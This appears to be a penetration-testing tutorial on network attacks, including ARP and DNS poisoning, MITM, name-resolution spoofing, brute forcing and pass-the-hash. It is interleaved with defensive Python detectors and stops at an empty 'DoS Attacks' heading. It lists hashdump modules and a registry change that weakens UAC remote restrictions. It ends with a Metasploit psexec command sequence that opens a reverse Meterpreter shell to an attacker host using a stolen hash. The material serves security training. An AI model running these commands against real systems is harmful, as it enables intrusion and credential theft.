Common Network Attack Techniques

Network Attack

Sniffing vs Eavesdropping

Sniffing is a straightforward way to passively obtain a lot of information about the network. You can use it to identify hosts, services, device types, protocols, subnets, IP addresses, and much more. Sniffing particularly takes advantage of cleartext protocols such as TCP, UDP, IP, ARP, ICMP, IGMP, LDAP, SNMP, SMB, FTP, DNS, DHCP, SMTP/POP3/IMAP, telnet, HTTP, TFTP, unsecured versions of SIP, unencrypted routing protocols, and many others. If the traffic is in cleartext, you can extract credentials, capture files and images, read messages, and obtain data meant for other users and machines.

Sniffers such as Wireshark have the ability to re-create entire TCP sessions and capture whole documents and images from the network. Even if the traffic payload is encrypted, you can still observe source and destination addresses and ports, WLAN SSIDs and initialization vectors (encryption key data), and accompanying cleartext messages. If the traffic is encapsulated inside a VPN, you can still see VPN handshakes and the outer wrapper IP addresses. Some packets, such as ARP messages, are distinct in structure and easily recognized, even when encrypted. They can still be captured and replayed in chosen ciphertext attacks such as WEP cracking.

Successful sniffing requires two conditions to be true:

  • The sniffer’s interface must be in promiscuous mode. This means it will pick up all traffic, no matter what the destination MAC is. Otherwise, it would ignore traffic not specifically addressed to it.
  • The traffic you want to sniff must directly pass by the sniffer’s interface. In other words, the sniffer must be on the same shared network segment as the traffic it is sniffing. This means you cannot sniff remotely! What this second condition takes depends on the topology:
      • If the devices are plugged into a hub, it will be no problem, as a hub will repeat all frames out all ports.
      • If the devices are plugged into a switch, you must poison the MAC table of the switch so it will repeat desired traffic out the port the sniffer is connected to.
      • If the devices are on a different subnet or VLAN, you must plant a sniffer on that segment and poison the switch’s MAC table to repeat the frames to the proper port.
      • If the segment is wireless, the sniffer must be within radio range.
      • If all of the desired traffic passes through a router, you can compromise the router to forward copies of that traffic to the attacker. Using a simple Generic Routing Encapsulation (GRE) tunnel will allow routers with access to the Internet to forward traffic anywhere in the world.

https://www.wireshark.org/

Eavesdropping

In general usage, eavesdropping is defined as the act of secretly listening to someone else’s private conversation. You can be within hearing range of the speaker, though perhaps in a place where they cannot see you, such as behind a door or partition, around the corner, or listening to another telephone extension on the same line. You could also plant a bug somewhere in the room that will transmit what it hears to a receiver some distance away.

In the world of penetration testing, although eavesdropping could include listening in on someone’s speech or a telephone conversation, it can also refer to other types of surveillance, including:

  • Planting a sniffer on a network.
  • Secretly placing a camera or microphone in the room.
  • Capturing VoIP packets off the network and replaying them.
  • Using your phone to record someone entering a password or PIN across the room.
  • Using a WiFi Pineapple or other man-in-the-middle device to capture wireless traffic.
  • Using an IMSI-catcher man-in-the-middle device to intercept cell phone calls.

ARP Poisoning

ARP poisoning is the deliberate mapping of an incorrect MAC address to a correct IP address. It is used to redirect traffic for malicious purposes and is the most common spoofing mechanism used on Ethernet and Wi-Fi networks. It allows an attacker to insert themselves in a man-in-the-middle attack between two legitimate hosts.

In TCP/IP, a packet cannot simply have a destination IP address before it is transmitted on a multi-access network. It must also have a corresponding OSI Layer 2 address. On Ethernet and Wi-Fi networks, this would be a MAC address. A host can use name resolution to look up a destination’s IP address, but it must also use ARP to learn the MAC address. Once the MAC-to-IP mapping is determined, that information is stored in the host’s ARP cache. Because the other devices can change their IP address, entries in the ARP cache age out and are updated every few minutes.

[Figure: ARP cache]

Unless you hard-code MAC-to-IP address mappings on your network, the relationship between a MAC address and an IP address is expected to be fluid and change. An attacker can take advantage of this in several ways:

  • You can send out a continuous stream of fake ARP replies declaring to the entire segment that your MAC is the correct one for the target IP address. In this way, when hosts intend to send a packet to the target, they are actually sending it to you.
  • You can send out a continuous stream of fake ARP replies declaring that your MAC address is the correct one for the default gateway (router). Any host wishing to send traffic to another network, including the Internet, must send it to you.
  • You can poison the MAC table of a switch with fake ARP replies so that it associates your victim’s MAC addresses to your switch port. Whenever the switch receives traffic destined for your victim, it will not only forward it out the switch port that the victim is connected to, but it will also forward a copy out your port.

If you wish to insert yourself between two hosts in a man-in-the-middle attack, you must poison the ARP cache of both hosts. In this way, they will communicate with each other through you. They will not realize that you are relaying all messages while capturing a copy for yourself. Because you are constantly streaming the spoofed MAC address to your victims, they never feel the need to perform their own ARP broadcast. They think they already have the mapping. When you stop ARP poisoning, the two hosts will eventually age your spoofed entries out of their ARP caches and learn each other’s correct MAC address. This process can take up to 10 minutes, unless you reboot the machines or manually clear their ARP caches.

ARP poisoning has its limits. Because you are spoofing Layer 2 addresses, the poisoner must be on the same network segment as the victims. If the victims are on another subnet, or on a remote network, you cannot conduct ARP poisoning against them. Similarly, if you are on a network that does not use MAC addresses, such as ATM, dial-up, or synchronous serial WAN links, ARP poisoning is useless.
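From the defender's side, the same ARP properties make poisoning easy to spot on the segment: replies that nobody asked for, replies whose ARP sender MAC disagrees with the Ethernet source MAC, and an IP address that suddenly maps to a different MAC than it did before. The following Python is an added example (not code from the original page or from any of the tools it lists) that parses raw Ethernet/ARP frames and raises those three alerts; the MAC and IP addresses and the three sample frames are constructed for the demonstration.

```python
"""ARP poisoning detector (added example; not from the original page).

Parses raw Ethernet II + ARP frames and raises an alert when a reply
(a) was never requested, (b) carries an ARP sender MAC different from the
Ethernet source MAC, or (c) re-maps an IP address that was already learned
with another MAC. Addresses and frames below are constructed; the checks
follow arpwatch-style logic.
"""
import socket
import struct
from typing import Dict, List, Optional, Set, Tuple

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(op: int, sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Construct an Ethernet II + ARP frame (used only to make sample traffic)."""
    eth_dst = b"\xff" * 6 if op == ARP_REQUEST else mac_bytes(tha)
    eth = struct.pack("!6s6sH", eth_dst, mac_bytes(sha), ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sha), socket.inet_aton(spa),
                      mac_bytes(tha), socket.inet_aton(tpa))
    return eth + arp


def parse_arp(frame: bytes) -> Optional[dict]:
    """Return the fields of an IPv4-over-Ethernet ARP frame, or None if it is not one."""
    if len(frame) < 42:
        return None
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "eth_src": mac_str(eth_src),
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


class ArpWatch:
    """Tracks IP-to-MAC bindings and outstanding requests seen on one segment."""

    def __init__(self) -> None:
        self.table: Dict[str, str] = {}               # ip -> last MAC seen
        self.pending: Set[Tuple[str, str]] = set()    # (asked ip, asker ip)
        self.alerts: List[Tuple[str, str]] = []

    def feed(self, frame: bytes) -> None:
        pkt = parse_arp(frame)
        if pkt is None:
            return
        if pkt["op"] == ARP_REQUEST:
            self.pending.add((pkt["target_ip"], pkt["sender_ip"]))
            self._learn(pkt)           # a request also announces its sender
        elif pkt["op"] == ARP_REPLY:
            if pkt["sender_mac"] != pkt["eth_src"]:
                self.alerts.append(("header-mismatch", pkt["sender_ip"]))
            key = (pkt["sender_ip"], pkt["target_ip"])
            if key in self.pending:
                self.pending.discard(key)
            else:                      # nobody asked: typical of a poisoning stream
                self.alerts.append(("unsolicited-reply", pkt["sender_ip"]))
            self._learn(pkt)

    def _learn(self, pkt: dict) -> None:
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.alerts.append(("remap", f"{ip}: {old} -> {mac}"))
        self.table[ip] = mac


def analyze(frames) -> List[Tuple[str, str]]:
    watch = ArpWatch()
    for frame in frames:
        watch.feed(frame)
    return watch.alerts


# Constructed sample: a PC resolves its gateway, then an attacker claims the gateway IP.
GW_MAC, GW_IP = "00:11:22:33:44:01", "192.168.1.1"
PC_MAC, PC_IP = "00:11:22:33:44:02", "192.168.1.10"
ATTACKER_MAC = "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    build_arp(ARP_REQUEST, PC_MAC, PC_IP, "00:00:00:00:00:00", GW_IP),
    build_arp(ARP_REPLY, GW_MAC, GW_IP, PC_MAC, PC_IP),
    build_arp(ARP_REPLY, ATTACKER_MAC, GW_IP, PC_MAC, PC_IP),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_FRAMES):
        print(*alert)
```

Run against the sample, the genuine request/reply pair produces nothing, and the attacker's reply produces an "unsolicited-reply" alert followed by a "remap" alert for 192.168.1.1. On a real segment the same logic would be fed from a capture, and the "remap" rule is the one worth alerting on first, since the other two fire on some legitimate gratuitous ARP as well.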

[Figure: Wireshark capture of ARP poisoning]

ARP Poisoning Tools

Several tools can perform ARP poisoning, including:

  • Metasploit auxiliary/spoof/arp/arp_poisoning
  • Ettercap
  • Bettercap
  • dsniff
  • Cain & Abel
  • Arpspoof
  • Arpoison
  • MITMf

Some tools have other functionality built into them. For example, Cain & Abel can ARP poison, sniff the network, capture login sessions using a wide variety of protocols, crack intercepted encrypted passwords, record VoIP conversations, and more. The only effective way to defend against ARP poisoning is to hard-code all MAC-to-IP or MAC-to-switchport mappings. You can create manual entries in the various devices and on the switch.


TCP Session Hijacking

TCP session hijacking is the act of taking a user’s or client’s place after it has already established a TCP connection with a server. Typically, the user or client device has already authenticated, and the attacker wants to take over the connection without having to provide any credentials. This attack depends on several conditions to work:

  • The session must use a cleartext protocol that can be sniffed, such as telnet, FTP, or rlogin.
  • The attacker must be able to observe and correctly anticipate incrementing TCP sequence numbers (they jump pseudo-randomly to evade hijacking, but can be predicted after some observation).
  • The packets must not be digitally signed.

The high-level steps for TCP session hijacking are:

  1. Watch the client/server TCP sequence numbers increment (may require ARP poisoning).
  2. Send the client some spoofed TCP FIN packets so it thinks the server wants to end the session (alternatively, conduct and sustain some other denial-of-service attack against the client).
  3. Spoof your IP and/or MAC address to pretend you are the client.
  4. Once the client has disconnected, smoothly continue the conversation with the server.

[Figure: TCP session hijacking]

TCP Session Hijacking Tools

Common tools used for TCP session hijacking include:

  • Hunt
  • Juggernaut
  • Shijack
  • T-sight

Note: For more information about TCP session hijacking see https://www.sans.org/reading-room/whitepapers/windows/session-hijacking-windows-networks-2124


Man-in-the-Middle Attacks

A man-in-the-middle (MITM) attack is one in which the attacker inserts himself in the middle of a connection. It differs from a hijacking attack in that it does not replace the client, but rather acts as a relay between the client and server. Both sides think they are communicating directly with each other, but they are actually doing it through the MITM. The MITM then captures information that might otherwise be encrypted, or manipulates the data in some other way.

[Figure: MITM example]

Here are some common examples of an MITM attack:

  • SSL downgrading/stripping:
      1. The MITM inserts itself between a web client and server.
      2. The MITM creates a secure HTTPS session with the server.
      3. The MITM forces the client to accept either a cleartext HTTP session or a downgraded HTTPS session with a more vulnerable version of SSL.
      4. The MITM runs some type of sniffer that collects credentials as the user logs on.
  • Netcat relay:
      1. A target Windows Server is sitting behind a firewall.
      2. The firewall permits TCP 80 but not TCP 135 to pass through it.
      3. A Netcat listener has been planted on the target. It is waiting for incoming TCP 80 connections.
      4. When TCP 80 traffic comes to the target, Netcat rewrites the destination port to TCP 135 and relays the traffic to the DCOM service.
      5. An outside attacker is able to exploit DCOM even through a firewall.
  • A WiFi Pineapple or Pumpkin (rogue wireless access point) attracts Wi-Fi clients to connect to the network through it.
  • A Stingray or other IMSI catcher masquerades as a legitimate cell phone tower, inducing cell phones to make calls through it.

MITM requires some type of spoofing, usually ARP poisoning or changing IP addresses/port numbers. It can be thwarted if the client and server digitally sign their packets, or, in the case of a website, if the server enforces HTTP Strict Transport Security (HSTS).
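The HSTS defence works because the client, not the server, refuses to send cleartext once it has seen the policy, so a stripping MITM has nothing to downgrade. The following Python is an added example (not from the original page) showing both halves: a parser and auditor for the Strict-Transport-Security header, and a small client-side cache that decides whether an http:// request must be upgraded, including the superdomain match used for includeSubDomains. Host names, header values and the fixed clock are constructed; the rules follow RFC 6797.

```python
"""HSTS policy handling (added example, not from the original page).

Models both sides of HTTP Strict Transport Security as RFC 6797 describes
them: a server's Strict-Transport-Security header is parsed and stored only
when it arrived over TLS, and later plain-http requests to a known host (or
a subdomain, if includeSubDomains was set) are upgraded before any
cleartext request leaves the client. Hosts and headers are constructed; the
clock is injectable so the walk-through is deterministic.
"""
import time
from typing import Callable, Dict, List, Optional, Tuple

ONE_YEAR = 31536000


def parse_hsts(header_value: str) -> Optional[Tuple[int, bool]]:
    """Return (max_age, include_subdomains); None if max-age is missing or invalid."""
    max_age, include_sub = None, False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None
            max_age = int(value)
        elif name == "includesubdomains":
            include_sub = True
    return None if max_age is None else (max_age, include_sub)


def audit_hsts(header_value: Optional[str], min_age: int = ONE_YEAR) -> List[str]:
    """Defender's view: list the weaknesses of a server's HSTS configuration."""
    if not header_value:
        return ["no Strict-Transport-Security header: first visit can be stripped"]
    parsed = parse_hsts(header_value)
    if parsed is None:
        return ["malformed header: browsers ignore it"]
    max_age, include_sub = parsed
    problems = []
    if max_age < min_age:
        problems.append(f"max-age {max_age} is below {min_age}")
    if not include_sub:
        problems.append("includeSubDomains missing: subdomains stay strippable")
    return problems


class HstsCache:
    """Client-side policy store keyed by lowercase host name."""

    def __init__(self, now: Callable[[], float] = time.time) -> None:
        self.now = now
        self.entries: Dict[str, Tuple[float, bool]] = {}   # host -> (expiry, subdomains)

    def record(self, host: str, header_value: str, received_over_tls: bool) -> bool:
        # RFC 6797 section 8.1: the header is only honoured on a secure transport,
        # otherwise a MITM could plant or clear policies over plain HTTP.
        if not received_over_tls:
            return False
        parsed = parse_hsts(header_value)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        host = host.lower()
        if max_age == 0:                      # max-age=0 deletes the policy
            self.entries.pop(host, None)
        else:
            self.entries[host] = (self.now() + max_age, include_sub)
        return True

    def must_use_https(self, host: str) -> bool:
        """True if an http:// request to host must be rewritten to https://."""
        labels = host.lower().split(".")
        for i in range(len(labels)):          # exact host first, then each superdomain
            entry = self.entries.get(".".join(labels[i:]))
            if entry is None:
                continue
            expiry, include_sub = entry
            if expiry > self.now() and (i == 0 or include_sub):
                return True
        return False


def demo() -> Dict[str, bool]:
    """Constructed walk-through; returns the upgrade decision for several hosts."""
    cache = HstsCache(now=lambda: 1_000.0)
    cache.record("Example.com", "max-age=31536000; includeSubDomains", True)
    cache.record("bank.test", "max-age=300", True)
    cache.record("shop.test", "max-age=31536000", False)   # seen over plain HTTP: ignored
    return {h: cache.must_use_https(h)
            for h in ("www.example.com", "bank.test", "login.bank.test", "shop.test")}
```

In the walk-through, www.example.com is upgraded because of the parent policy, bank.test is upgraded but login.bank.test is not (no includeSubDomains), and shop.test is never upgraded because its header was only ever seen over plain HTTP, which is exactly the first-visit gap that preloading closes.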

MITM Tools

Here are some common tools that are used in man-in-the-middle attacks:

  • ettercap
  • bettercap
  • Wireshark
  • ratched
  • mitmproxy
  • Netcat
  • Nmap
  • CERT Tapioca
  • Seth
  • Xerosploit
  • Metasploit mitm proxy modules
  • MITMf

Note: MITMf (Framework for Man-in-the-Middle Attacks) is a Python script that contains a complete suite of attack features. For more information, see https://github.com/byt3bl33d3r/MITMf

Note: Do not confuse MITM with proxying. Although they are similar, their intent is different. MITM manipulates traffic generated by a legitimate host. Proxying manipulates traffic generated by an attacker.


DNS Cache Poisoning

DNS cache poisoning, also known as DNS spoofing, is an attack technique in which corrupt DNS data is entered into a DNS server’s lookup (resolver) cache. These fake records are then given to clients and other DNS servers.

There are millions of DNS servers worldwide, but most of them do not directly manage any records. When a client needs to resolve a name, it asks its local DNS server for the IP address. If the local server does not have a record, it asks other DNS servers for the information and then caches (stores) the result in case someone else needs it. If the attacker can insert false records into the DNS server’s cache, the DNS server will provide those false records to its clients. This can cause a cascading effect in which other DNS servers are poisoned by the original, passing along their corrupt records to more clients and DNS servers.

[Figure: DNS cache poisoning example]

Some foreign governments use DNS cache poisoning against their own DNS servers to prevent their citizens from accessing certain types of content on the Internet. If you can’t directly attack the DNS server, you can also masquerade as the local DNS server, sending fake replies to clients as they try to resolve names.

Unfortunately, the trusting and open nature of DNS makes it intrinsically vulnerable to cache poisoning and spoof attacks. The Kaminsky Bug (CVE-2008-1447) underscored the challenge of trying to fix a fundamental flaw in a protocol that basically runs the Internet. DNSSEC (attaching digital signatures to DNS records) was considered to be the only real remedy, but even 10 years later it is still not widely implemented.
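What lets a forged answer land in a resolver cache is that it matches the outstanding query on every field the attacker had to guess. The following Python is an added example (not from the page or from any of the tools it lists) of the resolver-side checks that shrink the Kaminsky-style window: server address and randomized source port, transaction ID, question section, and bailiwick (records outside the queried server's zone are dropped even from an otherwise valid answer). It builds and parses minimal DNS wire-format messages; the addresses, names and the pending query are constructed.

```python
"""Resolver-side checks against cache poisoning (added example, not from the
original page). A response is cached only if it matches the outstanding
query on source address and randomized port, 16-bit transaction ID and
question section; records outside the server's bailiwick are dropped.
Messages are constructed; only A records are built, though the parser
reads any RR type and handles name compression."""
import socket
import struct
from typing import Dict, List, Tuple

Record = Tuple[str, str, int, int, bytes]   # (section, owner, type, ttl, rdata)


def encode_name(name: str) -> bytes:
    out = b"".join(bytes([len(l)]) + l.encode() for l in name.rstrip(".").split("."))
    return out + b"\x00"


def build_response(txid: int, qname: str, answers=(), additional=()) -> bytes:
    """Construct a DNS response (QR/RD/RA set) with IN A records: (owner, ttl, ipv4)."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(answers), 0, len(additional))
    body = encode_name(qname) + struct.pack("!HH", 1, 1)
    for owner, ttl, ip in list(answers) + list(additional):
        body += encode_name(owner) + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + body


def decode_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a (possibly compressed) name; returns (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_response(msg: bytes) -> Dict:
    """Parse header, the (single) question and all RRs by section."""
    txid, flags, _qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    qname, off = decode_name(msg, off)
    qtype, _qclass = struct.unpack("!HH", msg[off:off + 4])
    off += 4
    records: List[Record] = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            owner, off = decode_name(msg, off)
            rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10
            records.append((section, owner, rtype, ttl, msg[off:off + rdlen]))
            off += rdlen
    return {"txid": txid, "qr": bool(flags & 0x8000), "qname": qname,
            "qtype": qtype, "records": records}


def in_bailiwick(owner: str, zone: str) -> bool:
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


def validate_response(pending: Dict, src_ip: str, dst_port: int,
                      msg: bytes) -> Tuple[List[Record], str]:
    """Return (records safe to cache, reason). `pending` is our outstanding query."""
    if src_ip != pending["server"] or dst_port != pending["src_port"]:
        return [], "rejected: not from the queried server to our randomized port"
    resp = parse_response(msg)
    if resp["txid"] != pending["txid"]:
        return [], "rejected: transaction ID mismatch"
    if not resp["qr"] or resp["qname"].lower() != pending["qname"].lower():
        return [], "rejected: question section does not match the query"
    cacheable = [r for r in resp["records"] if in_bailiwick(r[1], pending["bailiwick"])]
    return cacheable, "accepted"


# Constructed scenario: we asked example.com's name server for www.example.com.
PENDING = {"txid": 0x1234, "qname": "www.example.com", "server": "198.51.100.53",
           "src_port": 53211, "bailiwick": "example.com"}
GENUINE = build_response(0x1234, "www.example.com",
                         answers=[("www.example.com", 300, "192.0.2.10")],
                         additional=[("ns.victim.test", 86400, "203.0.113.9")])  # out of bailiwick
FORGED = build_response(0x1235, "www.example.com",
                        answers=[("www.example.com", 86400, "203.0.113.9")])     # wrong TXID guess
```

The genuine answer is accepted but only its in-bailiwick record is cached; the same bytes delivered to port 53 instead of the randomized query port are rejected before parsing, and the forged answer fails on the transaction ID. With a fixed source port an off-path attacker only has the 16-bit ID to guess, which is why port randomization was the post-Kaminsky fix and DNSSEC the real one.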

DNS Cache Poisoning Tools

DNS cache poisoning and spoofing tools include:

  • Metasploit auxiliary/spoof/dns/bailiwicked_host
  • ettercap with the dns_spoof plugin
  • MITMf
  • Kali Dnsspoof
  • ARPwner
  • Kali DNSchef

Name Resolution Exploits

In addition to DNS, there are other name resolution exploits the pen tester can use. Originally, Microsoft Windows computers did not use DNS to resolve names. They used NetBIOS Name Service (NBNS) queries. If a Microsoft WINS server or a local lmhosts text file didn’t have the needed information, then the host would send out a special broadcast in the hope that the desired server would hear it and respond. Starting with Windows Vista, NetBIOS-NS was replaced with the Link-Local Multicast Name Resolution protocol. It uses multicasting rather than broadcasting, and supports both IPv4 and IPv6. If a client can’t resolve a name using DNS, it can send out an LLMNR multicast to the local segment to try to resolve the name.

Windows computers follow a specific order to resolve names:

  1. Check if the destination is itself.
  2. Check if the name is in the DNS resolver caches already.
  3. Check if the name is in the %systemroot%\system32\drivers\etc\hosts file.
  4. Query the DNS server.
  5. Send an LLMNR multicast to 224.0.0.252 (IPv6 FF02::1:3), UDP port 5355.
  6. Send a NetBIOS name query broadcast to 255.255.255.255, UDP port 137.

It is possible to exploit name resolution at any of these levels (except the first). The attacker could:

  • Poison the DNS server or client resolver cache.
  • Edit the client’s hosts file.
  • Enable a tool to listen for LLMNR/NBNS queries and respond with itself as the desired destination. When the client then tries to connect, it prompts the user to log on based on the protocol the client is using, thus harvesting the user’s credentials.

Note: Kali’s responder can also listen for multicast DNS (MDNS). This is a special implementation of DNS in which the client does not need to know the IP address of the DNS server, instead sending out a multicast to 224.0.0.251 (IPv6 FF02::FB) to UDP 5353 to perform name resolution. It is used by Apple Bonjour, Avahi, and to a limited extent Android and Windows 10.
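A responder tool of the kind described above is conspicuous on the wire precisely because it answers LLMNR, NBNS and mDNS queries for names it does not own. The Python below is an added example (not from the page, and not from Responder or MITMf) that replays constructed, simplified log lines, checks that queries go to the multicast or broadcast address listed in the resolution order above for each protocol, and flags a source that answers for several unrelated names or for a canary name that no real host owns. The log format, addresses and host names are assumptions made for the demonstration.

```python
"""Spotting a rogue LLMNR/NBNS/mDNS responder (added example, not from the
original page). A legitimate host answers a multicast name query only for
its own name; a responder tool answers for whatever is asked. Input lines
are constructed and simplified to
"<time> <proto> <query|response> <src> -> <dst> <name>"."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proto>LLMNR|NBNS|mDNS) (?P<kind>query|response) "
    r"(?P<src>[\d.]+) -> (?P<dst>[\d.]+) (?P<name>\S+)$")

# Where each protocol's queries are sent (addresses from the resolution order above).
QUERY_DST = {"LLMNR": "224.0.0.252", "NBNS": "255.255.255.255", "mDNS": "224.0.0.251"}


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def detect_rogue_responders(lines, canaries=frozenset(),
                            max_names: int = 2) -> List[Tuple[str, str, str]]:
    """Return (rule, responder_ip, name) alerts in the order they fire."""
    answered: Dict[str, set] = defaultdict(set)    # responder ip -> names it answered for
    alerts: List[Tuple[str, str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        name = rec["name"].upper()
        if rec["kind"] == "query":
            if rec["dst"] != QUERY_DST[rec["proto"]]:
                alerts.append(("unexpected-query-destination", rec["src"], name))
            continue
        names = answered[rec["src"]]
        names.add(name)
        if name in canaries:                     # nobody owns this name: any answer is rogue
            alerts.append(("canary-answered", rec["src"], name))
        if len(names) == max_names + 1:          # fires once per responder
            alerts.append(("answers-many-names", rec["src"], name))
    return alerts


def flagged_hosts(alerts) -> set:
    return {ip for _rule, ip, _name in alerts}


# Constructed sample: 10.0.0.20 is a real file server, 10.0.0.66 answers everything.
SAMPLE_LOG = [
    "10:00:01 LLMNR query 10.0.0.15 -> 224.0.0.252 FILESRV01",
    "10:00:01 LLMNR response 10.0.0.20 -> 10.0.0.15 FILESRV01",
    "10:00:05 NBNS query 10.0.0.15 -> 255.255.255.255 PRNTSRV",
    "10:00:05 NBNS response 10.0.0.66 -> 10.0.0.15 PRNTSRV",
    "10:00:06 LLMNR query 10.0.0.31 -> 224.0.0.252 WPAD",
    "10:00:06 LLMNR response 10.0.0.66 -> 10.0.0.31 WPAD",
    "10:00:09 LLMNR query 10.0.0.15 -> 224.0.0.252 FILESRV-TYPO",
    "10:00:09 LLMNR response 10.0.0.66 -> 10.0.0.15 FILESRV-TYPO",
    "10:00:12 mDNS query 10.0.0.15 -> 224.0.0.251 canary-nosuchhost.local",
    "10:00:12 mDNS response 10.0.0.66 -> 10.0.0.15 canary-nosuchhost.local",
]
CANARIES = frozenset({"CANARY-NOSUCHHOST.LOCAL"})

if __name__ == "__main__":
    for alert in detect_rogue_responders(SAMPLE_LOG, CANARIES):
        print(*alert)
```

The canary rule is the cheap, high-confidence one: a scheduled job on a workstation that periodically asks for a name nobody owns turns every answer into an alert, while the many-names rule catches a responder even when no canary is in play. The complementary fix on the clients is to disable LLMNR and NetBIOS over TCP/IP so the queries are never sent.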

Name Resolution Attack Tools

Tools you can use to conduct name resolution attacks include:

  • Kali responder
  • Metasploit auxiliary/spoof/llmnr/llmnr_response
  • MITMf

[Figure: Kali responder]

Network Authentication Brute Forcing

Most network-based services can be configured to lock a user account after a certain number of failed logon attempts. Some services, however, do not implement this type of policy. Others exempt the administrator or root from the policy, so that you will never be locked out as you repeatedly try to guess the password. You can dramatically speed up the process by using an automated brute force attack. Brute forcing tools can use different protocols such as SMB, telnet, SMTP, POP3/IMAP, HTTP, FTP, and others to target various network services. You supply the tool with a wordlist of user names and passwords which it will try until it succeeds or exhausts the list.

Examples of brute forcing tools include:

  • Hydra
  • Medusa
  • Ncrack
  • NetBIOS Auditing Tool
  • AET2 Brutus
  • Aircrack-ng
  • John the Ripper
  • Rainbow Crack
  • Cain & Abel
  • L0phtCrack
  • Ophcrack
  • Hashcat
  • Metasploit modules:
      • auxiliary/scanner/http/http_login
      • auxiliary/scanner/smb/smb_login
      • auxiliary/scanner/telnet/telnet_login
      • auxiliary/scanner/snmp/snmp_login
      • auxiliary/scanner/ssh/ssh_login

Note: Metasploit has many brute forcing tools. To see a list of choices, conduct a search at the msfconsole by entering

search type:auxiliary -S _login

Pass the Hash Attacks

Sometimes a password will be too long or complex to crack. In that case, you could instead try to pass the hash. In this type of attack, when you log on to the target operating system or application, you provide the user name and the hash of the password, rather than the password itself. You obtain the hashes by inducing the operating system or application to dump them from RAM, the Windows Registry, or a credentials file. Metasploit has many hashdump-related modules you can use against Linux, Windows, applications, and other platforms. Most of them are post modules you run after you have compromised the target and obtained a Meterpreter prompt. Here are a few for collecting hashes:

post/windows/gather/smart_hashdump
post/linux/gather/hashdump
post/pro/multi/gather/hashdump
post/windows/gather/credentials/domain_hashdump
post/windows/gather/credentials/mssql_local_hashdump
post/windows/gather/credentials/skype
post/windows/gather/credentials/avira_password
post/windows/gather/credentials/mcafee_vse_hashdump

[Figure: Dumping hashes]

Note: To obtain a complete list of hashdump-related Metasploit tools, conduct a search at the Metasploit console, such as search hash platform:windows.

Once you have the hashes, there are several tools you can use to test usability, pass, or crack them, including:

  • Metasploit modules exploit/windows/smb/psexec and auxiliary/scanner/smb/smb_login
  • Hydra
  • Medusa
  • Veil-Catapult

[Figure: Pass the hash attack]

Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this; you would not even be able to pass the Administrator hash, and would need to turn off Credential Guard first. Separately, even when Credential Guard is not running on the target, you might have to edit the Registry. Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.

Note: For information about disabling Windows Defender Credential Guard, see https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage.

Note: For an interesting article on disabling the LocalAccountTokenFilterPolicy, see http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/


Pass-the-Hash

Let’s use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute force the password plaintext. This is a “feature” of older versions of Windows.

See Also: https://security.stackexchange.com/questions/141681/can-an-intruder-still-possibly-succeed-with-pass-the-hash-or-pass-the-ticket-on

msf6> use exploit/windows/smb/psexec
msf6> set RHOST 172.16.30.88    # The DATABASE host
msf6> set SMBUser Administrator
msf6> set SMBPass TheHashedPassword
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6> set LHOST 172.16.20.55    # Security-Desk
msf6> set LPORT 4445            # We need a different port since 4444 is already in use by Meterpreter on the Domain Controller
msf6> exploit -j
msf6> sessions

DoS Attacks

